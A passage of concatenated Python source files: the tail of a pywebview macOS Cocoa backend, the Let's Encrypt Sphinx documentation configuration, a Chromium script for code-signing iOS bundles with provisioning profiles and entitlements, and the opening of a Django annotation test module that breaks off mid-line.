_add_view_menu(self): """ Create a default View menu that shows 'Enter Full Screen'. 
""" mainMenu = self.app.mainMenu() # Create an View menu and make it a submenu of the main menu viewMenu = AppKit.NSMenu.alloc().init() viewMenu.setTitle_(localization["cocoa.menu.view"]) viewMenuItem = AppKit.NSMenuItem.alloc().init() viewMenuItem.setSubmenu_(viewMenu) mainMenu.addItem_(viewMenuItem) # TODO: localization of the Enter fullscreen string has no effect fullScreenMenuItem = viewMenu.addItemWithTitle_action_keyEquivalent_(localization["cocoa.menu.fullscreen"], "toggleFullScreen:", "f") fullScreenMenuItem.setKeyEquivalentModifierMask_(AppKit.NSControlKeyMask | AppKit.NSCommandKeyMask) def _append_app_name(self, val): """ Append the application name to a string if it's available. If not, the string is returned unchanged. :param str val: The string to append to :return: String with app name appended, or unchanged string :rtype: str """ if "CFBundleName" in info: val += " {}".format(info["CFBundleName"]) return val @staticmethod def nscolor_from_hex(hex_string): """ Convert given hex color to NSColor. :hex_string: Hex code of the color as #RGB or #RRGGBB """ hex_string = hex_string[1:] # Remove leading hash if len(hex_string) == 3: hex_string = ''.join([c*2 for c in hex_string]) # 3-digit to 6-digit hex_int = int(hex_string, 16) rgb = ( (hex_int >> 16) & 0xff, # Red byte (hex_int >> 8) & 0xff, # Blue byte (hex_int) & 0xff # Green byte ) rgb = [i / 255.0 for i in rgb] # Normalize to range(0.0, 1.0) return AppKit.NSColor.colorWithSRGBRed_green_blue_alpha_(rgb[0], rgb[1], rgb[2], 1.0) @staticmethod def get_instance(attr, value): """ Return a BrowserView instance by the :value of its given :attribute, and None if no match is found. 
""" for i in list(BrowserView.instances.values()): try: if getattr(i, attr) == value: return i except AttributeError: break return None @staticmethod def display_confirmation_dialog(first_button, second_button, message): AppKit.NSApplication.sharedApplication() AppKit.NSRunningApplication.currentApplication().activateWithOptions_(AppKit.NSApplicationActivateIgnoringOtherApps) alert = AppKit.NSAlert.alloc().init() alert.addButtonWithTitle_(first_button) alert.addButtonWithTitle_(second_button) alert.setMessageText_(message) alert.setAlertStyle_(AppKit.NSWarningAlertStyle) if alert.runModal() == AppKit.NSAlertFirstButtonReturn: return True else: return False @staticmethod def _set_debugging(): command = ['defaults', 'write', 'org.python.python', 'WebKitDeveloperExtras', '-bool', 'true'] if sys.version < '3': subprocess.call(command) else: subprocess.run(command) def create_window(uid, title, url, width, height, resizable, fullscreen, min_size, confirm_quit, background_color, debug, js_api, text_select, webview_ready): def create(): browser = BrowserView(uid, title, url, width, height, resizable, fullscreen, min_size, confirm_quit, background_color, debug, js_api, text_select, webview_ready) browser.show() if uid == 'master': create() else: AppHelper.callAfter(create) def set_title(title, uid): BrowserView.instances[uid].set_title(title) def create_file_dialog(dialog_type, directory, allow_multiple, save_filename, file_types): file_filter = [] # Parse file_types to obtain allowed file extensions for s in file_types: description, extensions = parse_file_type(s) file_extensions = [i.lstrip('*.') for i in extensions.split(';') if i != '*.*'] file_filter.append([description, file_extensions or None]) i = list(BrowserView.instances.values())[0] # arbitary instance return i.create_file_dialog(dialog_type, directory, allow_multiple, save_filename, file_filter) def load_url(url, uid): BrowserView.instances[uid].load_url(url) def load_html(content, base_uri, uid): 
BrowserView.instances[uid].load_html(content, base_uri) def destroy_window(uid): BrowserView.instances[uid].destroy() def toggle_fullscreen(uid): BrowserView.instances[uid].toggle_fullscreen() def get_current_url(uid): return BrowserView.instances[uid].get_current_url() def evaluate_js(script, uid): return BrowserView.instances[uid].evaluate_js(script)
# -*- coding: utf-8 -*- # # Let's Encrypt documentation build configuration file, created by # sphinx-quickstart on Sun Nov 23 20:35:21 2014. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import codecs import os import re import sys import mock # http://docs.readthedocs.org/en/latest/faq.html#i-get-import-errors-on-libraries-that-depend-on-c-modules # c.f. #262 sys.modules.update( (mod_name, mock.MagicMock()) for mod_name in ['augeas']) here = os.path.abspath(os.path.dirname(__file__)) # read version number (and other metadata) from package init init_fn = os.path.join(here, '..', 'letsencrypt', '__init__.py') with codecs.open(init_fn, encoding='utf8') as fd: meta = dict(re.findall(r"""__([a-z]+)__ = "([^"]+)""", fd.read())) # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath(os.path.join(here, '..'))) for pkg in 'acme', 'letsencrypt-apache', 'letsencrypt-nginx': sys.path.insert(0, os.path.abspath(os.path.join(here, '..', pkg))) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. 
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.intersphinx',
    'sphinx.ext.todo',
    'sphinx.ext.coverage',
    'sphinx.ext.viewcode',
    'repoze.sphinx.autointerface',
    'sphinxcontrib.programoutput',
]

# Document members in source order and include private members so the
# developer documentation covers the whole implementation.
autodoc_member_order = 'bysource'
autodoc_default_flags = ['show-inheritance', 'private-members']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Let\'s Encrypt'
copyright = u'2014, Let\'s Encrypt Project'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# Derived from the package metadata read above (``meta['version']``).
version = '.'.join(meta['version'].split('.')[:2])
# The full version, including alpha/beta/rc tags.
release = meta['version']

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all
# documents.
# ``py:obj`` lets bare `Name` references resolve as Python objects.
default_role = 'py:obj'

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. #keep_warnings = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # http://docs.readthedocs.org/en/latest/theme.html#how-do-i-use-this-locally-and-on-read-the-docs # on_rtd is whether we are on readthedocs.org on_rtd = os.environ.get('READTHEDOCS', None) == 'True' if not on_rtd: # only import and set the theme if we're building docs locally import sphinx_rtd_theme html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()] # otherwise, readthedocs.org uses their theme by default, so no need to specify it # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. 
#html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. #html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Language to be used for generating the HTML full-text search index. 
# Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr' #html_search_language = 'en' # A dictionary with options for the search language support, empty by default. # Now only 'ja' uses this config value #html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. #html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = 'LetsEncryptdoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', # Latex figure (float) alignment #'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ ('index', 'LetsEncrypt.tex', u'Let\'s Encrypt Documentation', u'Let\'s Encrypt Project', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). 
man_pages = [
    ('index', 'letsencrypt', u'Let\'s Encrypt Documentation',
     [project], 7),
    ('man/letsencrypt', 'letsencrypt', u'letsencrypt script documentation',
     [project], 1),
    ('man/letsencrypt-renewer', 'letsencrypt-renewer',
     u'letsencrypt-renewer script documentation', [project], 1),
    ('man/jws', 'jws', u'jws script documentation', [project], 1),
]

# If true, show URL addresses after external links.
#man_show_urls = False


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    ('index', 'LetsEncrypt', u'Let\'s Encrypt Documentation',
     u'Let\'s Encrypt Project', 'LetsEncrypt',
     'One line description of project.', 'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False


# Example configuration for intersphinx: refer to the Python standard library.
# Use the named form ({'name': (url, inventory)}): the positional
# {url: None} form is deprecated by Sphinx, and https avoids a redirect on
# every inventory fetch.
intersphinx_mapping = {'python': ('https://docs.python.org/', None)}

# Render ".. todo::" directives in the built documentation (sphinx.ext.todo).
todo_include_todos = True
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

import argparse
import codecs
import datetime
import fnmatch
import glob
import os
import plistlib
import shutil
import subprocess
import sys
import tempfile

# plistlib on Python 2 returns unicode strings; on Python 3, str.
try:
  _STRING_TYPES = (str, unicode)  # pylint: disable=undefined-variable
except NameError:
  _STRING_TYPES = (str,)


def _PlistFromBytes(serialized):
  """Parses a serialized XML property list on both Python 2 and 3.

  plistlib.readPlistFromString was removed in Python 3.9 while
  plistlib.loads does not exist on Python 2, so use whichever the
  running interpreter provides.

  Args:
    serialized: bytes containing an XML property list.

  Returns:
    The content of the property list as a python object.
  """
  if hasattr(plistlib, 'loads'):
    return plistlib.loads(serialized)
  return plistlib.readPlistFromString(serialized)


def GetProvisioningProfilesDir():
  """Returns the location of the installed mobile provisioning profiles.

  Returns:
    The path to the directory containing the installed mobile provisioning
    profiles as a string.
  """
  return os.path.join(
      os.environ['HOME'], 'Library', 'MobileDevice', 'Provisioning Profiles')


def LoadPlistFile(plist_path):
  """Loads property list file at |plist_path|.

  Args:
    plist_path: path to the property list file to load.

  Returns:
    The content of the property list file as a python object.
  """
  # The file may be in binary plist format; have plutil convert it to XML
  # on stdout before parsing.
  return _PlistFromBytes(subprocess.check_output([
      'xcrun', 'plutil', '-convert', 'xml1', '-o', '-', plist_path]))


class Bundle(object):
  """Wraps a bundle."""

  def __init__(self, bundle_path):
    """Initializes the Bundle object with data from bundle Info.plist file."""
    self._path = bundle_path
    self._data = LoadPlistFile(os.path.join(self._path, 'Info.plist'))

  @property
  def path(self):
    return self._path

  @property
  def identifier(self):
    return self._data['CFBundleIdentifier']

  @property
  def binary_path(self):
    return os.path.join(self._path, self._data['CFBundleExecutable'])

  def Validate(self, expected_mappings):
    """Checks that keys in the bundle have the expected value.

    Args:
      expected_mappings: a dictionary of string to object, each mapping will
      be looked up in the bundle data to check it has the same value (missing
      values will be ignored)

    Returns:
      A dictionary of the key with a different value between expected_mappings
      and the content of the bundle (i.e. errors) so that caller can format the
      error message. The dictionary will be empty if there are no errors.
    """
    errors = {}
    # items() works on Python 2 and 3 (iteritems() is Python 2 only).
    for key, expected_value in expected_mappings.items():
      if key in self._data:
        value = self._data[key]
        if value != expected_value:
          errors[key] = (value, expected_value)
    return errors


class ProvisioningProfile(object):
  """Wraps a mobile provisioning profile file."""

  def __init__(self, provisioning_profile_path):
    """Initializes the ProvisioningProfile with data from profile file."""
    self._path = provisioning_profile_path
    # The profile is a CMS-signed plist; ask the security tool to strip the
    # signature and emit the plain plist before parsing it.
    self._data = _PlistFromBytes(subprocess.check_output([
        'xcrun', 'security', 'cms', '-D', '-u', 'certUsageAnyCA',
        '-i', provisioning_profile_path]))

  @property
  def path(self):
    return self._path

  @property
  def application_identifier_pattern(self):
    return self._data.get('Entitlements', {}).get('application-identifier', '')

  @property
  def application_identifier_prefix(self):
    return self._data.get('ApplicationIdentifierPrefix', [''])[0]

  @property
  def entitlements(self):
    return self._data.get('Entitlements', {})

  @property
  def expiration_date(self):
    # Defaults to "now" so a profile without the key is treated as expired
    # rather than as valid forever.
    return self._data.get('ExpirationDate', datetime.datetime.now())

  def ValidToSignBundle(self, bundle_identifier):
    """Checks whether the provisioning profile can sign bundle_identifier.

    Args:
      bundle_identifier: the identifier of the bundle that needs to be
      signed.

    Returns:
      True if the mobile provisioning profile can be used to sign a bundle
      with the corresponding bundle_identifier, False otherwise.
    """
    # The application-identifier entitlement is a glob such as
    # "PREFIX.com.example.*"; match it against "PREFIX.bundle_identifier".
    return fnmatch.fnmatch(
        '%s.%s' % (self.application_identifier_prefix, bundle_identifier),
        self.application_identifier_pattern)

  def Install(self, installation_path):
    """Copies mobile provisioning profile info to |installation_path|."""
    shutil.copy2(self.path, installation_path)


class Entitlements(object):
  """Wraps an Entitlement plist file."""

  def __init__(self, entitlements_path):
    """Initializes Entitlements object from entitlement file."""
    self._path = entitlements_path
    self._data = LoadPlistFile(self._path)

  @property
  def path(self):
    return self._path

  def ExpandVariables(self, substitutions):
    """Expands every $(NAME) occurrence using the |substitutions| mapping."""
    self._data = self._ExpandVariables(self._data, substitutions)

  def _ExpandVariables(self, data, substitutions):
    """Recursively expands $(NAME) variables in the strings of |data|."""
    if isinstance(data, _STRING_TYPES):
      for key, substitution in substitutions.items():
        data = data.replace('$(%s)' % (key,), substitution)
      return data

    if isinstance(data, dict):
      for key, value in data.items():
        data[key] = self._ExpandVariables(value, substitutions)
      return data

    if isinstance(data, list):
      for i, value in enumerate(data):
        data[i] = self._ExpandVariables(value, substitutions)
      return data

    # Scalars that need no expansion (bool, int, datetime, ...) are returned
    # unchanged; without this the caller would receive None for them.
    return data

  def LoadDefaults(self, defaults):
    """Adds every mapping from |defaults| that the file does not override."""
    for key, value in defaults.items():
      if key not in self._data:
        self._data[key] = value

  def WriteTo(self, target_path):
    """Serializes the entitlements as an XML plist to |target_path|."""
    # plistlib.writePlist was removed in Python 3.9; plistlib.dump does not
    # exist on Python 2.
    if hasattr(plistlib, 'dump'):
      with open(target_path, 'wb') as fobj:
        plistlib.dump(self._data, fobj)
    else:
      plistlib.writePlist(self._data, target_path)


def FindProvisioningProfile(bundle_identifier, required):
  """Finds mobile provisioning profile to use to sign bundle.

  Args:
    bundle_identifier: the identifier of the bundle to sign.
    required: whether to abort the script with an error if no valid
      provisioning profile is found.

  Returns:
    The ProvisioningProfile object that can be used to sign the Bundle
    object or None if no matching provisioning profile was found.
  """
  provisioning_profile_paths = glob.glob(
      os.path.join(GetProvisioningProfilesDir(), '*.mobileprovision'))

  # Iterate over all installed mobile provisioning profiles and filter those
  # that can be used to sign the bundle, ignoring expired ones.
  now = datetime.datetime.now()
  valid_provisioning_profiles = []
  one_hour = datetime.timedelta(0, 3600)
  for provisioning_profile_path in provisioning_profile_paths:
    provisioning_profile = ProvisioningProfile(provisioning_profile_path)
    if provisioning_profile.expiration_date - now < one_hour:
      sys.stderr.write(
          'Warning: ignoring expired provisioning profile: %s.\n' %
          provisioning_profile_path)
      continue
    if provisioning_profile.ValidToSignBundle(bundle_identifier):
      valid_provisioning_profiles.append(provisioning_profile)

  if not valid_provisioning_profiles:
    if required:
      sys.stderr.write(
          'Error: no mobile provisioning profile found for "%s".\n' %
          bundle_identifier)
      sys.exit(1)
    return None

  # Select the most specific mobile provisioning profile, i.e. the one with
  # the longest application identifier pattern (prefer the one with the latest
  # expiration date as a secondary criteria).
  selected_provisioning_profile = max(
      valid_provisioning_profiles,
      key=lambda p: (len(p.application_identifier_pattern), p.expiration_date))

  one_week = datetime.timedelta(7)
  if selected_provisioning_profile.expiration_date - now < 2 * one_week:
    # Trailing newline added so the warning does not run into later output.
    sys.stderr.write(
        'Warning: selected provisioning profile will expire soon: %s\n' %
        selected_provisioning_profile.path)
  return selected_provisioning_profile


def CodeSignBundle(bundle_path, identity, extra_args):
  """Invokes codesign on |bundle_path| and filters benign warnings.

  Args:
    bundle_path: path to the bundle to sign.
    identity: code signing identity to use ('-' means ad-hoc signing).
    extra_args: extra arguments to append to the codesign invocation.
  """
  # universal_newlines makes stderr a text string on Python 3 (it is bytes
  # otherwise, which would break the endswith() filtering below).
  process = subprocess.Popen(
      ['xcrun', 'codesign', '--force', '--sign', identity, '--timestamp=none']
      + list(extra_args) + [bundle_path],
      stderr=subprocess.PIPE,
      universal_newlines=True)
  _, stderr = process.communicate()
  if process.returncode:
    sys.stderr.write(stderr)
    sys.exit(process.returncode)
  for line in stderr.splitlines():
    if line.endswith(': replacing existing signature'):
      # Ignore warning about replacing existing signature as this should only
      # happen when re-signing system frameworks (and then it is expected).
      continue
    sys.stderr.write(line)
    sys.stderr.write('\n')


def InstallSystemFramework(framework_path, bundle_path, args):
  """Install framework from |framework_path| to |bundle| and code-re-sign it."""
  installed_framework_path = os.path.join(
      bundle_path, 'Frameworks', os.path.basename(framework_path))

  if os.path.isfile(framework_path):
    shutil.copy(framework_path, installed_framework_path)
  elif os.path.isdir(framework_path):
    if os.path.exists(installed_framework_path):
      shutil.rmtree(installed_framework_path)
    shutil.copytree(framework_path, installed_framework_path)

  CodeSignBundle(installed_framework_path, args.identity,
      ['--deep', '--preserve-metadata=identifier,entitlements,flags'])


def GenerateEntitlements(path, provisioning_profile, bundle_identifier):
  """Generates an entitlements file.

  Args:
    path: path to the entitlements template file
    provisioning_profile: ProvisioningProfile object to use, may be None
    bundle_identifier: identifier of the bundle to sign.

  Returns:
    The Entitlements object with defaults loaded and variables expanded.
  """
  entitlements = Entitlements(path)
  if provisioning_profile:
    entitlements.LoadDefaults(provisioning_profile.entitlements)
    app_identifier_prefix = \
        provisioning_profile.application_identifier_prefix + '.'
  else:
    # Ad-hoc signing: no team prefix is available, use a wildcard.
    app_identifier_prefix = '*.'
  entitlements.ExpandVariables({
      'CFBundleIdentifier': bundle_identifier,
      'AppIdentifierPrefix': app_identifier_prefix,
  })
  return entitlements


def GenerateBundleInfoPlist(bundle_path, plist_compiler, partial_plist):
  """Generates the bundle Info.plist for a list of partial .plist files.

  Args:
    bundle_path: path to the bundle
    plist_compiler: string, path to the Info.plist compiler
    partial_plist: list of path to partial .plist files to merge
  """
  # Filter empty partial .plist files (this happens if an application
  # does not include need to compile any asset catalog, in which case
  # the partial .plist file from the asset catalog compilation step is
  # just a stamp file).
  filtered_partial_plist = []
  for plist in partial_plist:
    plist_size = os.stat(plist).st_size
    if plist_size:
      filtered_partial_plist.append(plist)

  # Invoke the plist_compiler script. It needs to be a python script.
  subprocess.check_call([
      'python', plist_compiler, 'merge', '-f', 'binary1',
      '-o', os.path.join(bundle_path, 'Info.plist'),
  ] + filtered_partial_plist)


class Action(object):
  """Class implementing one action supported by the script."""

  @classmethod
  def Register(cls, subparsers):
    parser = subparsers.add_parser(cls.name, help=cls.help)
    parser.set_defaults(func=cls._Execute)
    cls._Register(parser)


class CodeSignBundleAction(Action):
  """Class implementing the code-sign-bundle action."""

  name = 'code-sign-bundle'
  help = 'perform code signature for a bundle'

  @staticmethod
  def _Register(parser):
    parser.add_argument(
        '--entitlements', '-e', dest='entitlements_path',
        help='path to the entitlements file to use')
    parser.add_argument(
        'path', help='path to the iOS bundle to codesign')
    parser.add_argument(
        '--identity', '-i', required=True,
        help='identity to use to codesign')
    parser.add_argument(
        '--binary', '-b', required=True,
        help='path to the iOS bundle binary')
    parser.add_argument(
        '--framework', '-F', action='append', default=[], dest='frameworks',
        help='install and resign system framework')
    parser.add_argument(
        '--disable-code-signature', action='store_true', dest='no_signature',
        help='disable code signature')
    parser.add_argument(
        '--disable-embedded-mobileprovision', action='store_false',
        default=True, dest='embedded_mobileprovision',
        help='disable finding and embedding mobileprovision')
    parser.add_argument(
        '--platform', '-t', required=True,
        help='platform the signed bundle is targeting')
    parser.add_argument(
        '--partial-info-plist', '-p', action='append', default=[],
        help='path to partial Info.plist to merge to create bundle Info.plist')
    parser.add_argument(
        '--plist-compiler-path', '-P', action='store',
        help='path to the plist compiler script (for --partial-info-plist)')
    parser.set_defaults(no_signature=False)

  @staticmethod
  def _Execute(args):
    if not args.identity:
      args.identity = '-'

    if args.partial_info_plist:
      GenerateBundleInfoPlist(
          args.path, args.plist_compiler_path, args.partial_info_plist)

    bundle = Bundle(args.path)

    # According to Apple documentation, the application binary must be the same
    # as the bundle name without the .app suffix. See crbug.com/740476 for more
    # information on what problem this can cause.
    #
    # To prevent this class of error, fail with an error if the binary name is
    # incorrect in the Info.plist as it is not possible to update the value in
    # Info.plist at this point (the file has been copied by a different target
    # and ninja would consider the build dirty if it was updated).
    #
    # Also checks that the name of the bundle is correct too (does not cause
    # the build to be considered dirty, but still terminate the script in case
    # of an incorrect bundle name).
    #
    # Apple documentation is available at:
    # https://developer.apple.com/library/content/documentation/CoreFoundation/Conceptual/CFBundles/BundleTypes/BundleTypes.html
    bundle_name = os.path.splitext(os.path.basename(bundle.path))[0]
    errors = bundle.Validate({
        'CFBundleName': bundle_name,
        'CFBundleExecutable': bundle_name,
    })
    if errors:
      for key in sorted(errors):
        value, expected_value = errors[key]
        sys.stderr.write('%s: error: %s value incorrect: %s != %s\n' % (
            bundle.path, key, value, expected_value))
      sys.stderr.flush()
      sys.exit(1)

    # Delete existing embedded mobile provisioning.
    embedded_provisioning_profile = os.path.join(
        bundle.path, 'embedded.mobileprovision')
    if os.path.isfile(embedded_provisioning_profile):
      os.unlink(embedded_provisioning_profile)

    # Delete existing code signature.
    signature_file = os.path.join(args.path, '_CodeSignature', 'CodeResources')
    if os.path.isfile(signature_file):
      shutil.rmtree(os.path.dirname(signature_file))

    # Install system frameworks if requested.
    for framework_path in args.frameworks:
      InstallSystemFramework(framework_path, args.path, args)

    # Copy main binary into bundle.
    if os.path.isfile(bundle.binary_path):
      os.unlink(bundle.binary_path)
    shutil.copy(args.binary, bundle.binary_path)

    if args.no_signature:
      return

    codesign_extra_args = []

    if args.embedded_mobileprovision:
      # Find mobile provisioning profile and embeds it into the bundle (if a
      # code signing identify has been provided, fails if no valid mobile
      # provisioning is found).
      provisioning_profile_required = args.identity != '-'
      provisioning_profile = FindProvisioningProfile(
          bundle.identifier, provisioning_profile_required)
      if provisioning_profile and args.platform != 'iphonesimulator':
        provisioning_profile.Install(embedded_provisioning_profile)

        if args.entitlements_path is not None:
          temporary_entitlements_file = \
              tempfile.NamedTemporaryFile(suffix='.xcent')
          codesign_extra_args.extend(
              ['--entitlements', temporary_entitlements_file.name])

          entitlements = GenerateEntitlements(
              args.entitlements_path, provisioning_profile, bundle.identifier)
          entitlements.WriteTo(temporary_entitlements_file.name)

    CodeSignBundle(bundle.path, args.identity, codesign_extra_args)


class CodeSignFileAction(Action):
  """Class implementing code signature for a single file."""

  name = 'code-sign-file'
  help = 'code-sign a single file'

  @staticmethod
  def _Register(parser):
    parser.add_argument(
        'path', help='path to the file to codesign')
    parser.add_argument(
        '--identity', '-i', required=True,
        help='identity to use to codesign')
    parser.add_argument(
        '--output', '-o',
        help='if specified copy the file to that location before signing it')
    parser.set_defaults(sign=True)

  @staticmethod
  def _Execute(args):
    if not args.identity:
      args.identity = '-'

    install_path = args.path
    if args.output:
      # Replace whatever is at the output location before copying.
      if os.path.isfile(args.output):
        os.unlink(args.output)
      elif os.path.isdir(args.output):
        shutil.rmtree(args.output)

      if os.path.isfile(args.path):
        shutil.copy(args.path, args.output)
      elif os.path.isdir(args.path):
        shutil.copytree(args.path, args.output)

      install_path = args.output

    CodeSignBundle(install_path, args.identity,
        ['--deep', '--preserve-metadata=identifier,entitlements'])


class GenerateEntitlementsAction(Action):
  """Class implementing the generate-entitlements action."""

  name = 'generate-entitlements'
  help = 'generate entitlements file'

  @staticmethod
  def _Register(parser):
    parser.add_argument(
        '--entitlements', '-e', dest='entitlements_path',
        help='path to the entitlements file to use')
    parser.add_argument(
        'path', help='path to the entitlements file to generate')
    parser.add_argument(
        '--info-plist', '-p', required=True,
        help='path to the bundle Info.plist')

  @staticmethod
  def _Execute(args):
    info_plist = LoadPlistFile(args.info_plist)
    bundle_identifier = info_plist['CFBundleIdentifier']
    provisioning_profile = FindProvisioningProfile(bundle_identifier, False)
    entitlements = GenerateEntitlements(
        args.entitlements_path, provisioning_profile, bundle_identifier)
    entitlements.WriteTo(args.path)


def Main():
  # Cache this codec so that plistlib can find it. See
  # https://crbug.com/999461#c12 for more details.
  codecs.lookup('utf-8')

  parser = argparse.ArgumentParser('codesign iOS bundles')
  subparsers = parser.add_subparsers()

  actions = [
      CodeSignBundleAction,
      CodeSignFileAction,
      GenerateEntitlementsAction,
  ]

  for action in actions:
    action.Register(subparsers)

  args = parser.parse_args()
  args.func(args)


if __name__ == '__main__':
  sys.exit(Main())
from __future__ import unicode_literals import datetime from decimal import Decimal from django.core.exceptions import FieldDoesNotExist, FieldError from django.db.models import ( F, BooleanField, CharField, Count, DateTimeField, ExpressionWrapper, Func, IntegerField, Sum, Value, ) from django.test import TestCase from django.utils import six from .models import ( Author, Book, Company, DepartmentStore, Employee, Publisher, Store, Ticket, ) def cxOracle_py3_bug(func): """ There's a bug in Django/cx_Oracle with respect to string handling under Python 3 (essentially, they treat Python 3 strings as Python 2 strings rather than unicode). This makes some tests here fail under Python 3, so we mark them as expected failures until someone fixes them in #23843. """ from unittest import expectedFailure from django.db import connection return expectedFailure(func) if connection.vendor == 'oracle' and six.PY3 else func class NonAggregateAnnotationTestCase(TestCase): @classmethod def setUpTestData(cls): cls.a1 = Author.objects.create(name='Adrian Holovaty', age=34) cls.a2 = Author.objects.create(name='Jacob Kaplan-Moss', age=35) cls.a3 = Author.objects.create(name='Brad Dayley', age=45) cls.a4 = Author.objects.create(name='James Bennett', age=29) cls.a5 = Author.objects.create(name='Jeffrey Forcier', age=37) cls.a6 = Author.objects.create(name='Paul Bissex', age=29) cls.a7 = Author.objects.create(name='Wesley J. 
